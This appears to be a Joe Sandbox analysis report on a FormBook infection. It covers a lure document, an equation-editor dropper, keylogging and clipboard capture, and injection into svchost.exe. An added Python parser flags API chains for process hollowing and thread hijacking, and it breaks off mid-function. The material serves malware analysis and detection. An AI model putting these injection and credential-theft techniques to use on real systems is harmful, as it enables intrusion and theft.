Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040548D
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00C44632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 5_2_00C30508

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the 19 h . yellow bar above ,0 This document is 3. Once you have enabled ed
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004181D0 NtCreateFile, 6_2_004181D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418280 NtReadFile, 6_2_00418280
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418300 NtClose, 6_2_00418300
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004183B0 NtAllocateVirtualMemory, 6_2_004183B0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004182FA NtClose, 6_2_004182FA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418284 NtReadFile, 6_2_00418284
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004183AB NtAllocateVirtualMemory, 6_2_004183AB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE00C4 NtCreateFile,LdrInitializeThunk, 6_2_00BE00C4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0078 NtResumeThread,LdrInitializeThunk, 6_2_00BE0078
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00BE0048
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE07AC NtCreateMutant,LdrInitializeThunk, 6_2_00BE07AC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF9F0 NtClose,LdrInitializeThunk, 6_2_00BDF9F0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF900 NtReadFile,LdrInitializeThunk, 6_2_00BDF900
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_00BDFAE8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_00BDFAD0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_00BDFBB8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_00BDFB68
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_00BDFC90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_00BDFC60
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFD8C NtDelayExecution,LdrInitializeThunk, 6_2_00BDFD8C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_00BDFDC0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_00BDFEA0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_00BDFED0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFFB4 NtCreateSection,LdrInitializeThunk, 6_2_00BDFFB4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE10D0 NtOpenProcessToken, 6_2_00BE10D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0060 NtQuerySection, 6_2_00BE0060
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE01D4 NtSetValueKey, 6_2_00BE01D4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE010C NtOpenDirectoryObject, 6_2_00BE010C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1148 NtOpenThread, 6_2_00BE1148
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF8CC NtWaitForSingleObject, 6_2_00BDF8CC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF938 NtWriteFile, 6_2_00BDF938
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1930 NtSetContextThread, 6_2_00BE1930
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAB8 NtQueryValueKey, 6_2_00BDFAB8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFA20 NtQueryInformationFile, 6_2_00BDFA20
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFA50 NtEnumerateValueKey, 6_2_00BDFA50
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFBE8 NtQueryVirtualMemory, 6_2_00BDFBE8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFB50 NtCreateKey, 6_2_00BDFB50
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC30 NtOpenProcess, 6_2_00BDFC30
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC48 NtSetInformationFile, 6_2_00BDFC48
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0C40 NtGetContextThread, 6_2_00BE0C40
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1D80 NtSuspendThread, 6_2_00BE1D80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFD5C NtEnumerateKey, 6_2_00BDFD5C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFE24 NtWriteVirtualMemory, 6_2_00BDFE24
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFFFC NtCreateProcessEx, 6_2_00BDFFFC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFF34 NtQueueApcThread, 6_2_00BDFF34
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004181D0 NtCreateFile, 6_1_004181D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418280 NtReadFile, 6_1_00418280
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418300 NtClose, 6_1_00418300
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004183B0 NtAllocateVirtualMemory, 6_1_004183B0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004182FA NtClose, 6_1_004182FA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418284 NtReadFile, 6_1_00418284
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004183AB NtAllocateVirtualMemory, 6_1_004183AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008500C4 NtCreateFile,LdrInitializeThunk, 10_2_008500C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008507AC NtCreateMutant,LdrInitializeThunk, 10_2_008507AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F9F0 NtClose,LdrInitializeThunk, 10_2_0084F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F900 NtReadFile,LdrInitializeThunk, 10_2_0084F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAB8 NtQueryValueKey,LdrInitializeThunk, 10_2_0084FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_0084FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 10_2_0084FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 10_2_0084FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FB50 NtCreateKey,LdrInitializeThunk, 10_2_0084FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_0084FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 10_2_0084FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 10_2_0084FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_0084FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_0084FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 10_2_0084FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008510D0 NtOpenProcessToken, 10_2_008510D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850048 NtProtectVirtualMemory, 10_2_00850048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850060 NtQuerySection, 10_2_00850060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850078 NtResumeThread, 10_2_00850078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008501D4 NtSetValueKey, 10_2_008501D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085010C NtOpenDirectoryObject, 10_2_0085010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851148 NtOpenThread, 10_2_00851148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F8CC NtWaitForSingleObject, 10_2_0084F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851930 NtSetContextThread, 10_2_00851930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F938 NtWriteFile, 10_2_0084F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FA20 NtQueryInformationFile, 10_2_0084FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FA50 NtEnumerateValueKey, 10_2_0084FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FBE8 NtQueryVirtualMemory, 10_2_0084FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC90 NtUnmapViewOfSection, 10_2_0084FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC30 NtOpenProcess, 10_2_0084FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850C40 NtGetContextThread, 10_2_00850C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC48 NtSetInformationFile, 10_2_0084FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851D80 NtSuspendThread, 10_2_00851D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FD5C NtEnumerateKey, 10_2_0084FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FEA0 NtReadVirtualMemory, 10_2_0084FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FE24 NtWriteVirtualMemory, 10_2_0084FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FFFC NtCreateProcessEx, 10_2_0084FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FF34 NtQueueApcThread, 10_2_0084FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000981D0 NtCreateFile, 10_2_000981D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098280 NtReadFile, 10_2_00098280
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098300 NtClose, 10_2_00098300
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000983B0 NtAllocateVirtualMemory, 10_2_000983B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098284 NtReadFile, 10_2_00098284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000982FA NtClose, 10_2_000982FA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000983AB NtAllocateVirtualMemory, 10_2_000983AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0078632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 10_2_0078632E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 10_2_007867C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00786332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 10_2_00786332
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C2 NtQueryInformationProcess, 10_2_007867C2
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle, 5_2_00C342D5
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461
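The Nt* chains listed above for svchost.exe at 10_2_0078632E (NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection) and 10_2_007867C7 (NtSetContextThread, NtQueueApcThread, NtResumeThread), together with the OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx sequence in vbc.exe, are the call chains a reviewer reads these entries for: section map/unmap inside one function is the process-hollowing primitive, context overwrite plus APC plus resume is thread hijacking, and ExitWindowsEx fails without the shutdown privilege, which is why the token is adjusted first. The following Python is an added example, not Joe Sandbox's own code, that parses "Code function" lines of the layout seen in this report into per-function API sequences and matches them against ordered chains. The sample lines are constructed from entries in this report (the vbc.exe chain abbreviated), the chain and capability labels are this example's own assumptions, and the single-call Nt* stubs at 0084FC30/0084FE24/0084FF34 are matched only as an unordered per-process capability set because the report cannot show ordering across separate stubs.

```python
"""Parse Joe Sandbox 'Code function' lines and flag API-call chains.

Added example, not Joe Sandbox code. Assumes the line layout seen in this
report: 'Source: <image> Code function: <pid>_<stage>_<addr>[:] <api,api,...,> <same id>'.
"""
import re
from collections import defaultdict

# Constructed sample: entries copied from the report (vbc.exe chain abbreviated),
# including three single-call syscall stubs that only make sense per process.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC30 NtOpenProcess, 10_2_0084FC30",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FE24 NtWriteVirtualMemory, 10_2_0084FE24",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FF34 NtQueueApcThread, 10_2_0084FF34",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0078632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 10_2_0078632E",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 10_2_007867C7",
    r"Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle, 5_2_00C342D5",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461",
    r"Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00C34148",
    r"Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C4E37C 5_3_03C4E37C",
]

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+):?"
    r"(?: (?P<apis>[A-Za-z0-9_#,]+))?,? (?P=fid)$"
)
# Drop the ANSI/Wide suffix so LookupPrivilegeValueA and ...W compare equal.
SUFFIX_RE = re.compile(r"^(.+[a-z0-9])[AW]$")

# Ordered chains that must occur inside one function (higher confidence).
# Labels are this example's own, not report signature names.
CHAINS = {
    "process hollowing: section created, mapped, then unmapped":
        ["NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"],
    "thread hijack: context overwritten, APC queued, thread resumed":
        ["NtSetContextThread", "NtQueueApcThread", "NtResumeThread"],
    "privilege enabled on own token, then ExitWindowsEx":
        ["OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges", "ExitWindowsEx"],
    "process enumeration via Toolhelp32":
        ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"],
    "device driver communication":
        ["CreateFile", "DeviceIoControl"],
}
# Unordered sets matched over the union of a process's functions (lower confidence).
CAPABILITIES = {
    "remote write + APC primitives present (separate stubs)":
        {"NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread"},
}


def normalise(api):
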